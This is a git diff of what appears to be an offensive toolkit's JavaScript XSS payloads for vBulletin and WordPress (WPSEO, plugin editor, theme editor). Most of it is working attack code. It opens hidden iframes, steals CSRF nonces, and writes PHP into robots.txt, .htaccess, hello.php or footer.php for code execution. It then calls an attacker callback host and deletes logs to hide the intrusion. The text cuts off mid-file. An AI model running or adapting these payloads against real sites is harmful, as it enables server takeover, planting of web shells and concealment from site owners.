top.document.getElementById('silent_frame').contentDocument.getElementById('varbits').submit(); + + // Specifically located in this section to prevent double-loading of the URL + var request = new XMLHttpRequest(); // Initiate XMLHttpRequest + request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request.send(); // Send the request + + SetCookie("XSS_Infected", "true"); // Prevent re-infection / loops + // TODO: Maybe change the cookie name and value in the future. + } + + // Give the malicious linkback two seconds to inject our payload, before self-removal + // Old method: var end = setTimeout("clean_up()", 2000); + setTimeout(function() { + clean_up(); + }, 2000); + +} + +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. +// Delete all linkBacks on the current page - Including our injected XSS+JS payload. +function clean_up() { + // noinspection Annotator + js_check_all_option(document.linkbacks, -1); + // noinspection Annotator + document.linkbacks.submit(); + // The JS function and DOM property above, are defined by vBulletin. + // TODO: Maybe use native methods for "check all checkboxes" or something similar. +} + +// TODO: Look into HTML5 Storage instead of cookies maybe. +// A function to create a cookie so the infection happens only once. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + // document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; + // The escape function has been deprecated. + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; +} + +// If our cookie is not present, continue. +// Old method: document.cookie.indexOf("XSS_Infected") == -1 +// TODO: Turn this into a function where "XSS_Infected" will be an argument +if (!document.cookie.match(/^(.*;)?\s*XSS_Infected\s*=\s*[^;]+(.*)?$/)) { + // Append a (hidden) iframe to the HTML body for data injection + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', 'silent_frame'); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', 'main.silent_inject()'); + mainframe.setAttribute('src', 'plugin.php?do=add'); +} diff --git a/Payloads/javascript/wordpress_legacy.js b/Payloads/javascript/wordpress_legacy.js index 10b1376..42abb18 100644 --- a/Payloads/javascript/wordpress_legacy.js +++ b/Payloads/javascript/wordpress_legacy.js @@ -1,155 +1,188 @@ -// WordPress WPSEO Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version 2.5 - 2016 -// -// Changelog: -// - Ver 2.5: Added XMLHttpRequest for JS Notification -// -// Credits: InterN0T -// -// Requirements: -// 1) Ability to edit "robots.txt" and ".htaccess" within WPSEO. (Default feature) -// 2) That Apache is not configured with "AllowOverride None" for the document root. -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// Better WP Security - Stored XSS (Old Exploit - See Exploit-DB) -// Sample Injection Payload: "> -// The above JavaScipt writes a new script tag as follows: -// -// This is because WordPress or WPSEO is filtering unencoded script tags such as the above unencoded form. -// -// For ethical and legal purposes only. This script is provided as is and without warranty. - -var robots_shell = ''; // The python script automatically updates the PHP_PAYLOAD placeholder variable -var htacces_shell = "AddHandler application/x-httpd-php .txt"; // Execute .txt files as PHP - On some servers it needs to be: application/x-httpd-php5 - -// STAGE 1 - Inject into robots.txt -function silent_robots_inject() { - if (document.cookie.indexOf("Robots_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var robots_wpnonce = document.getElementById('silent_robots_frame').contentDocument.getElementById('robotstxtform')._wpnonce.value; // WP Nonce / CSRF Token - var robots_contents = document.getElementById('silent_robots_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of robots.txt - - // Prepoulated form - var robots_input = '\ - \ - \ - \ - \ - '; - - // Inject our prepopulated form into the iframe - silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor','POST',robots_input,'silent_robots_frame','robots_haxx'); - - // Submit our payload - There's no turning back now - top.document.getElementById('silent_robots_frame').contentDocument.getElementById('robots_haxx').submit(); - SetCookie("Robots_Infected","true"); // Prevent re-infection / loops - - } -} - - -// STAGE 2 - Inject into .htaccess -function silent_htaccess_inject() { - if (document.cookie.indexOf("Htaccess_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var htaccess_wpnonce = document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccessform')._wpnonce.value; // WP Nonce / CSRF Token - var htaccess_contents = document.getElementById('silent_htaccess_frame').contentDocument.getElementsByTagName('textarea')[1].value; // Current contents of .htaccess - - // Prepopulated form - var htaccess_input = '\ - \ - \ - \ - \ - '; - - // Inject our prepopulated form into the iframe - silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor','POST',htaccess_input,'silent_htaccess_frame','htaccess_haxx'); - - // Submit our payload - There's no turning back now - top.document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccess_haxx').submit(); - SetCookie("Htaccess_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - // Give our script two seconds to execute and inject the prepopulated forms before self-removal. - // Timeout changed from 5 seconds to 2 seconds - Version 2.5 - var end = setTimeout("clean_up()",2000); - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframes into the page -// USAGE: main_frame_inject("Robots_Infected","silent_robots_frame","silent_robots_inject()","admin.php?page=wpseo_files"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Injects a hidden form with prepopulated data -// USAGE: silent_form_inject('admin.php?page=wpseo_files','POST',htaccess_input,'silent_htaccess_frame','htaccess_haxx'); -function silent_form_inject(action,method,content,framename,identifier) { - var silent_main_tag = document.createElement('form'); - - // The inner contents of our form is equal to the content variable - silent_main_tag.innerHTML = ' '+content; - top.document.getElementById(framename).contentDocument.body.appendChild(silent_main_tag); - silent_main_tag.setAttribute('id',identifier); - silent_main_tag.setAttribute('name','blackhat2016'); // Changed name version 2.5 - silent_main_tag.setAttribute('action',action); - silent_main_tag.setAttribute('method',method); -} - -// Sets a cookie with a very long expiration time -// USAGE: SetCookie("Htaccess_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage. -// Delete all 404 log errors - Including the injected payload(s) -// This clean up function is only valid for Better WP Security. -// USAGE: clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// STAGE 1 - Robots.txt -main_frame_inject("Robots_Infected","silent_robots_frame","silent_robots_inject()","admin.php?page=wpseo_tools&tool=file-editor"); - -// STAGE 2 - .Htaccess -main_frame_inject("Htaccess_Infected","silent_htaccess_frame","silent_htaccess_inject()","admin.php?page=wpseo_tools&tool=file-editor"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress WPSEO Payload (Robots.txt and .htaccess) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Made various minor improvements. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Requirements: +1) Ability to edit "robots.txt" and ".htaccess" within WPSEO. (Default feature) +2) Apache is not configured with "AllowOverride None" for the document root. (Default, but often changed.) + +This payload was originally developed for: +* Better WP Security - Stored XSS (Old Exploit - See Exploit-DB) + +Sample Injection Payload: +"> +The above JavaScript writes a new script tag as follows: + +This is because WordPress or WPSEO is filtering unencoded script tags. + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var robots_shell = ''; +// The python script automatically updates the PHP_PAYLOAD placeholder variable +var htacces_shell = "AddHandler application/x-httpd-php .txt"; +// Execute .txt files as PHP - On some servers it needs to be: application/x-httpd-php5 +// TODO: Maybe add another line that specifies "php5/6/7" if it doesn't cause any errors. + +// STAGE 1 - Inject into robots.txt +// noinspection JSUnusedGlobalSymbols +function silent_robots_inject() { + //if (document.cookie.indexOf("Robots_Infected") == -1) { + // TODO: Make the "Robots_Infected" cookie name a function argument for silent_robots_inject() + if (!document.cookie.match(/^(.*;)?\s*Robots_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // TODO Note: For some reason "_wpnonce" was not changed to "nonce" by WPSEO. Later versions of WPSEO may utilize "nonce". + // noinspection Annotator + var robots_wpnonce = document.getElementById('silent_robots_frame').contentDocument.getElementById('robotstxtform')._wpnonce.value; // WP Nonce / CSRF Token + var robots_contents = document.getElementById('silent_robots_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of robots.txt + + // TODO: Use the pre-existing form in the future if possible. Consider switching to FormData() + // Prepoulated form + var robots_input = '\ + \ + \ + \ + \ + '; + + // Inject our prepopulated form into the iframe + silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor', 'POST', robots_input, 'silent_robots_frame', 'robots_haxx'); + + // Submit our payload - There's no turning back now + top.document.getElementById('silent_robots_frame').contentDocument.getElementById('robots_haxx').submit(); + + // TODO: Maybe change the cookie name and value in the future. + SetCookie("Robots_Infected", "true"); // Prevent re-infection / loops + } +} + +// STAGE 2 - Inject into .htaccess +// noinspection JSUnusedGlobalSymbols +function silent_htaccess_inject() { + //if (document.cookie.indexOf("Htaccess_Infected") == -1) { + // TODO: Make the "Htaccess_Infected" cookie name a function argument for silent_htaccess_inject() + if (!document.cookie.match(/^(.*;)?\s*Htaccess_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // TODO Note: For some reason "_wpnonce" was not changed to "nonce" by WPSEO. Current versions may utilise "nonce". + // noinspection Annotator + var htaccess_wpnonce = document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccessform')._wpnonce.value; // WP Nonce / CSRF Token + var htaccess_contents = document.getElementById('silent_htaccess_frame').contentDocument.getElementsByTagName('textarea')[1].value; // Current contents of .htaccess + + // TODO: Use the pre-existing form in the future if possible. Consider switching to FormData() + // Prepopulated form + var htaccess_input = '\ + \ + \ + \ + \ + '; + + // Inject our prepopulated form into the iframe + silent_form_inject('admin.php?page=wpseo_tools&tool=file-editor', 'POST', htaccess_input, 'silent_htaccess_frame', 'htaccess_haxx'); + + // Submit our payload - There's no turning back now + top.document.getElementById('silent_htaccess_frame').contentDocument.getElementById('htaccess_haxx').submit(); + + // TODO: Maybe change the cookie name and value in the future. + SetCookie("Htaccess_Infected", "true"); // Prevent re-infection / loops + + var request = new XMLHttpRequest(); // Initiate XMLHttpRequest + request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request.send(); // Send the request + + // Give our script two seconds to execute and inject the prepopulated forms before self-removal. + // Timeout changed from 5 seconds to 2 seconds - Version 2.5 + // Old method: var end = setTimeout("clean_up()", 2000); + setTimeout(function() { + clean_up(); + }, 2000); + + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframes into the page +// USAGE: main_frame_inject("Robots_Infected", "silent_robots_frame", "silent_robots_inject()", "admin.php?page=wpseo_files"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Injects a hidden form with prepopulated data +// USAGE: silent_form_inject("admin.php?page=wpseo_files", "POST", htaccess_input, "silent_htaccess_frame", "htaccess_haxx"); +function silent_form_inject(action, method, content, framename, identifier) { + var silent_main_tag = document.createElement('form'); + + // The inner contents of our form is equal to the content variable + silent_main_tag.innerHTML = ' '+content; + top.document.getElementById(framename).contentDocument.body.appendChild(silent_main_tag); + silent_main_tag.setAttribute('id', identifier); + silent_main_tag.setAttribute('name', 'BlackHat2017'); // Changed name version 2.75 + silent_main_tag.setAttribute('action', action); + silent_main_tag.setAttribute('method', method); +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Htaccess_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; + // Replaced escape() as it was deprecated. +} + +// NOTE: This function should always be executed after the final stage. +// Delete all 404 log errors - Including the injected payload(s) +// This clean up function is only valid for Better WP Security. +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. +// USAGE: clean_up() +function clean_up() { + // noinspection JSUndefinedPropertyAssignment + document.getElementById('404s').checked=true; + document.forms[0].submit(); +} + +// ============================================= FUNCTIONS END ============================================= \\ + +// STAGE 1 - Robots.txt +main_frame_inject("Robots_Infected", "silent_robots_frame", "silent_robots_inject()", "admin.php?page=wpseo_tools&tool=file-editor"); + +// STAGE 2 - .Htaccess +main_frame_inject("Htaccess_Infected", "silent_htaccess_frame", "silent_htaccess_inject()", "admin.php?page=wpseo_tools&tool=file-editor"); diff --git a/Payloads/javascript/wordpress_plugin.js b/Payloads/javascript/wordpress_plugin.js index a01277b..3d9eecf 100644 --- a/Payloads/javascript/wordpress_plugin.js +++ b/Payloads/javascript/wordpress_plugin.js @@ -1,126 +1,144 @@ -// WordPress Core Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version: 1.3 - 2016 -// -// Changelog: -// - Ver 1.3: Added XMLHttpRequest for JS Notification -// - Ver 1.3: request.open() on Line 62 is now set by xsser.py -// -// Credits: InterN0T -// -// Usage Notes: -// -- The hello.php plugin does not need to be activated within WordPress -// However, it does need to be present and writeable -// -// Updates: -// -- This version uses XMLHttpRequest and FormData -// -- This version injects into the Hello Dolly plugin -// -// Compatibility Notes: -// -- Very old browsers won't support FormData() and XMLHttpRequest() -// -// Requirements: -// 1) Ability to edit plugin files. (Default feature. However, this is typically disabled in hardened configurations.) -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// For ethical and legal purposes only. This script is provided as is and without warranty. - - -var php_input = ''; // This payload comments out any subsequent PHP code - -// Our iframe function which primarily injects a prepopulated form -function silent_plugins_inject() { - if (document.cookie.indexOf("Plugins_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token - var plugin_contents = document.getElementById('silent_plugins_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file - - // Initiate the form data object - var formData = new FormData(); - - // Create a variable which holds our PHP payload, a new line (Windows format), and then the current plugin data - var special_content = php_input+'\r\n'+plugin_contents - - // Prepopulated form with the CSRF (wp_nonce) token and our PHP payload variables specified - formData.append("_wpnonce", plugin_wpnonce); - formData.append("_wp_http_referer", "%2Fwp-admin%2Fplugin-editor.php%3Ffile%3Dhello.php"); - formData.append("newcontent", special_content); - formData.append("action", "update"); - formData.append("file", "hello.php"); - formData.append("theme", ""); // This variable name is probably not needed and also incorrect. However, it does not break our payload. - formData.append("scrollto", "0"); - formData.append("docs-list", ""); - - // Initiate XMLHttpRequest - var request = new XMLHttpRequest(); - - // Method and URL to send the request to - request.open("POST", "http://TARGETWEBSITE/wp-admin/plugin-editor.php"); // Set by xsser.py in this version. - // Example contents: http://www.some-wordpress-website.tld/wp-admin/plugin-editor.php - - // Send the request with our form data - request.send(formData); - - SetCookie("Plugins_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - clean_up(); // Remove initial payload from server - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframe into the page -// USAGE: main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Sets a cookie with a very long expiration time -// USAGE: SetCookie("Plugins_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage -// Delete all 404 log errors - Including the injected payload(s) -// This function is specific to the Better WP Security XSS issue -// USAGE: clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// USAGE: main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); -// function main_frame_inject(cookiename,identifier,function_name,get_page) -main_frame_inject("Plugins_Infected","silent_plugins_frame","silent_plugins_inject()","plugin-editor.php?file=hello.php"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress Core Payload (Plugin) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Various minor improvements. Version standardized across all files. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.5 : request.open() on Line 75 is now set by xsser.py +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Usage Notes: +-- The hello.php plugin does not need to be activated within WordPress + However, it does need to be present and writeable + +Compatibility Notes: +-- Very old browsers won't support FormData() and XMLHttpRequest() + +Requirements: +1) Ability to edit plugin files. (Default feature. However, this is typically disabled in hardened configurations.) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var php_input = ''; // This payload comments out any subsequent PHP code + +// Our iframe function which primarily injects a prepopulated form +// noinspection JSUnusedGlobalSymbols +function silent_plugins_inject() { + //if (document.cookie.indexOf("Plugins_Infected") == -1) { + // TODO: Make the "Plugins_Infected" cookie name a function argument for silent_plugins_inject() + if (!document.cookie.match(/^(.*;)?\s*Plugins_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token + // Newer versions use "nonce" instead of _wpnonce + // noinspection Annotator + var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template').nonce.value; // WP Nonce / CSRF Token + var plugin_contents = document.getElementById('silent_plugins_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file + + // TODO: Use the pre-existing form in the future if possible. + // Initiate the form data object + var formData = new FormData(); + + // Create a variable which holds our PHP payload, a new line (Windows format), and then the current plugin data + var special_content = php_input+'\r\n'+plugin_contents; + + // Prepopulated form with the CSRF ("_wpnonce") token and our PHP payload as specified + // formData.append("_wpnonce", plugin_wpnonce); + formData.append("nonce", plugin_wpnonce); // Variable has changed name to "nonce" + formData.append("_wp_http_referer", "%2Fwp-admin%2Fplugin-editor.php%3Ffile%3Dhello.php"); + formData.append("newcontent", special_content); + // formData.append("action", "update"); // This value has changed. See below + formData.append("action", "edit-theme-plugin-file"); + formData.append("file", "hello.php"); + formData.append("plugin", "hello.php"); + // formData.append("theme", ""); // This is no longer needed. Keep for now + // formData.append("scrollto", "0"); // Probably not needed. Keep for now + formData.append("docs-list", ""); + + // Initiate XMLHttpRequest + var request_one = new XMLHttpRequest(); + + // Method and URL to send the request to. + request_one.open("POST", "http://TARGETWEBSITE/wp-admin/plugin-editor.php"); // Set by: xsser.py + // Example contents: http://www.some-wordpress-website.tld/wp-admin/plugin-editor.php + // TODO: We may need to change this to ... /wp-admin/plugin-editor.php?file=hello.php + + // Send the request with our form data + request_one.send(formData); + + // TODO: Maybe change the cookie name and value in the future. + SetCookie("Plugins_Infected", "true"); // Prevent re-infection / loops + + // Notification feature + var request_two = new XMLHttpRequest(); // Initiate XMLHttpRequest + request_two.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by xsser.py + request_two.send(); // Send the request + + clean_up(); // Remove initial payload from server + + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframe into the page +// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Plugins_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; +} + +// NOTE: This function should always be executed after the final stage +// Delete all 404 log errors - Including the injected payload(s) +// This function is specific to the Better WP Security XSS issue +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. +// USAGE: clean_up() +function clean_up() { + // noinspection JSUndefinedPropertyAssignment + document.getElementById('404s').checked=true; + document.forms[0].submit(); +} + +// ============================================= FUNCTIONS END ============================================= \\ + +// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php"); +// function main_frame_inject(cookiename, identifier, function_name, get_page) +main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php"); diff --git a/Payloads/javascript/wordpress_theme.js b/Payloads/javascript/wordpress_theme.js index f917b7d..ae48824 100644 --- a/Payloads/javascript/wordpress_theme.js +++ b/Payloads/javascript/wordpress_theme.js @@ -1,122 +1,136 @@ -// WordPress Core Payload -// Author: Hans-Michael Varbaek -// Company: Sense of Security -// -// Version: 1.3 - 2016 -// -// Changelog: -// - Ver 1.3: Added XMLHttpRequest for JS Notification -// - Ver 1.3: request.open() on Line 62 is now set by xsser.py -// -// Credits: InterN0T -// -// Updates: -// -- This version uses XMLHttpRequest and FormData -// -- This version injects into the footer.php theme file -// -// Compatibility Notes: -// -- Very old browsers won't support FormData() and XMLHttpRequest() -// -// Requirements: -// 1) Ability to edit theme files. (Default feature. However, this is typically disabled in hardened configurations.) -// -// Tested Browsers: -// - Chrome (14 Nov 2015) - This should still work. -// - FireFox (04 Nov 2016) -// -// For ethical and legal purposes only. This script is provided as is and without warranty. - - -var php_input = ''; - -// Our iframe function which primarily injects a prepopulated form -function silent_themes_inject() { - if (document.cookie.indexOf("Themes_Infected") == -1) { - - // Read and save the relevant _wpnonce - Bypass CSRF protection - var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token - var themes_contents = document.getElementById('silent_themes_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file - - // Initiate the form data object - var formData = new FormData(); - - // Create a variable which holds the current theme data, a new line (Windows format), and then our php payload - var special_content = themes_contents+'\r\n'+php_input - - // Prepopulated form with the CSRF (wp_nonce) token and our PHP payload variables specified - formData.append("_wpnonce", themes_wpnonce); - formData.append("_wp_http_referer", "%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dfooter.php"); - formData.append("newcontent", special_content); - formData.append("action", "update"); - formData.append("file", "footer.php"); - formData.append("theme", ""); - formData.append("scrollto", "0"); - formData.append("docs-list", ""); - - // Initiate XMLHttpRequest - var request = new XMLHttpRequest(); - - // Method and URL to send the request to - request.open("POST", "http://TARGETWEBSITE/wp-admin/theme-editor.php"); // Set by xsser.py in this version. - // Example contents: http://www.some-wordpress-website.tld/wp-admin/theme-editor.php - - // Send the request with our form data - request.send(formData); - - SetCookie("Themes_Infected","true"); // Prevent re-infection / loops - - // NEW FEATURE - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - - clean_up(); // Remove initial payload from server - - } -} - - -// ============================================= FUNCTIONS START ============================================= \\ - -// Injects the main hidden iframe into the page -// USAGE: main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); -function main_frame_inject(cookiename,identifier,function_name,get_page) { - if (document.cookie.indexOf(cookiename) == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id',identifier); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload',function_name); - mainframe.setAttribute('style','visibility:hidden;display:none'); - mainframe.setAttribute('src',get_page); - } -} - -// Sets a cookie with a very long expiration time -// USAGE: SetCookie("Themes_Infected","true"); -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - -// NOTE: This function should always be executed after the final stage -// Delete all 404 log errors - Including the injected payload(s) -// This function is specific to the Better WP Security XSS issue -// USAGE: clean_up() -function clean_up() { - document.getElementById('404s').checked=true; - document.forms[0].submit(); -} - -// ============================================= FUNCTIONS END ============================================= \\ - -// USAGE: main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); -// function main_frame_inject(cookiename,identifier,function_name,get_page) -main_frame_inject("Themes_Infected","silent_themes_frame","silent_themes_inject()","theme-editor.php?file=footer.php"); - - -// PAYLOAD END \ No newline at end of file +/* +Title: WordPress Core Payload (Theme) +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Various minor improvements. Version standardized across all files. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.5 : request.open() on Line 68 is now set by xsser.py +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +Compatibility Notes: +-- Very old browsers won't support FormData() and XMLHttpRequest() + +Requirements: +1) Ability to edit theme files. (Default feature. However, this is typically disabled in hardened configurations.) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +var php_input = ''; + +// Our iframe function which primarily injects a prepopulated form. +// noinspection JSUnusedGlobalSymbols +function silent_themes_inject() { + //if (document.cookie.indexOf("Themes_Infected") == -1) { + // TODO: Make the "Themes_Infected" cookie name a function argument for silent_themes_inject() + if 